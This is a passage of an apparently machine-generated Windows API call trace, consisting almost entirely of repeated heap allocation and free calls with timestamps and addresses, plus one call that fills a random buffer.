0x4f41278 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.958] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.959] GetProcessHeap () returned 0x4f10000 [0060.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.960] GetProcessHeap () returned 0x4f10000 [0060.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.961] GetProcessHeap () returned 0x4f10000 [0060.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.962] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.962] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.963] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.963] GetProcessHeap () returned 0x4f10000 [0060.964] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.964] GetProcessHeap () returned 0x4f10000 [0060.964] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.004] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x50084e0, Size=0x80) returned 0x4f707c8 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a578 | out: hHeap=0x4f10000) returned 1 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12238 | out: hHeap=0x4f10000) returned 1 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f7f8a8 | out: hHeap=0x4f10000) returned 1 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12238 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12238, Size=0x80) returned 0x4f70850 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f39d90 | out: hHeap=0x4f10000) returned 1 [0061.004] SystemFunction036 (in: RandomBuffer=0x17e380, RandomBufferLength=0x80 | out: RandomBuffer=0x17e380) returned 1 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x4f39d90 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12238 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x102) returned 0x4f8a578 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1068) returned 0x4f41780 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.004] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.004] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.005] GetProcessHeap () returned 0x4f10000 [0061.005] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.006] GetProcessHeap () returned 0x4f10000 [0061.006] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.007] GetProcessHeap () returned 0x4f10000 [0061.007] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.007] 